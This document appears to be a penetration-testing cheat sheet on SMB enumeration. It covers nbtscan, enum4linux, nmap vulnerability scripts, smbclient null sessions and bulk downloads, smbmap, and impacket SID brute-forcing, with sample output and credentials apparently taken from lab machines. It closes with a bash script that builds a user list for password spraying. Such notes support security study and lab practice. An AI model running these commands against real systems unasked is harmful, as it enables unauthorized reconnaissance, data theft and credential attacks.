SMB
TCP ports 139, 445
Last updated
Note: after issuing a "dir" against a remote share from PowerShell you have roughly 10 seconds to run the "Get-SmbConnection" cmdlet. The SMB client tears the connection down once there is no activity between client and server, so an idle session will no longer show up. The alias "gsmbc" can be used instead of the full cmdlet name.
nbtscan
nbtscan — program for scanning networks for NetBIOS name information
e.g.
nbtscan -r 10.11.1.0/24
enum4linux (a bit out of date - consider using smbmap instead)
a useful tool for extracting information from an SMB null session
Useful for both Windows and Samba systems
the -a flag runs all of the simple enumeration (users, shares, groups, password policy, OS information)
e.g.
enum4linux -a 10.11.1.227
If this returns user, share or group information without any credentials being supplied, null sessions are allowed on the target.
Nmap Scripts
make use of OS discovery and the SMB enumeration scripts (smb-os-discovery, smb-enum-shares, smb-enum-users, etc.)
to check for known SMB protocol vulnerabilities, invoke one of the nmap smb-vuln scripts. Some of these checks (ms08-067 in particular) can crash the target service, which is why they require unsafe=1 to run; only use them where that is acceptable.
e.g.
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.201
View Shares
smbclient -L //<hostname>
smbclient -L //<hostname> -U%    (null session: empty username and empty password)
Connect to Shares
smbclient //<hostname>/<share> -U<username>%<password>
Download everything
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
smbclient -U user2020 '//10.10.10.50/sharename' -c 'prompt OFF;recurse ON;mget *'
smbmap -H <ip address>
lists file shares and permissions
there are also many other uses for the tool
see the help page for more info
smbmap -R <share name> -H <ip address>
recursively list all files in folders in a share located on a specific system
smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
download a file from the share
*** Depending on the smbmap version, the file may be saved next to the smbmap script rather than in the current directory
it's easiest to identify where it is stored by using find or locate
e.g. updatedb; locate Groups.xml
e.g. find / -name '*Groups.xml' 2>/dev/null
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
authenticated share listing with domain credentials (-d domain, -u user, -p password)
Metasploit
auxiliary/scanner/smb/smb_version
enumerate smb version
If smbclient fails to negotiate a session with an old server that only speaks SMBv1 (modern Samba clients refuse SMB1 by default):
Add the following line under "[global]" in /etc/samba/smb.conf (or pass it for a single run with --option='client min protocol=NT1'):
client min protocol = NT1
Enumerate SMB users
python3 /opt/impacket/examples/lookupsid.py <username>:<password>@<ip address or hostname>
root@kali:/opt/impacket/examples# python3 lookupsid.py hazard:stealth1agent@10.10.10.149
Impacket v0.9.22.dev1+20201112.141202.d1ced941 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
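As an added example (not part of the original notes or of impacket), a small bash filter that turns the lookupsid.py output shown above into a plain user list, ready for password spraying or a Kerberos pre-auth check. The sample text is the output above embedded as a constructed string so the script runs offline; the function names and the KEEP_BUILTIN switch are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): turn impacket lookupsid.py output
# into a plain user list. Function names and KEEP_BUILTIN are this example's own.
set -eu

# Constructed sample: the lookupsid.py output shown above, embedded so this runs offline.
SAMPLE_OUTPUT='[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)'

# lookupsid_domain_sid: read lookupsid.py output on stdin, print the domain SID.
lookupsid_domain_sid() {
  awk '/Domain SID is:/ { print $NF }'
}

# lookupsid_users: read lookupsid.py output on stdin, print one account name per line.
# Only SidTypeUser rows are kept (groups and aliases are dropped) and the DOMAIN\
# prefix is stripped. Well-known RIDs below 1000 (Administrator, Guest, ...) are
# skipped by default, since spraying them adds lockout risk and noise; set
# KEEP_BUILTIN=1 to include them.
lookupsid_users() {
  awk -v keep="${KEEP_BUILTIN:-0}" '
    /\(SidTypeUser\)$/ {
      rid = $1
      sub(/:$/, "", rid)
      if (rid + 0 < 1000 && keep != "1") next
      name = $2
      sub(/^[^\\]*\\/, "", name)
      print name
    }'
}

# Demo against the embedded sample. In a real run, replace the printf with
#   python3 lookupsid.py 'user:pass@10.10.10.149' | lookupsid_users > users.txt
printf 'Domain SID: %s\n' "$(printf '%s\n' "$SAMPLE_OUTPUT" | lookupsid_domain_sid)"
printf '%s\n' "$SAMPLE_OUTPUT" | lookupsid_users
```

The RID cut-off at 1000 matches how Windows allocates RIDs: built-in and well-known accounts sit below 1000, accounts created by administrators start at 1000 and upward, so the default output is exactly the custom accounts worth testing first.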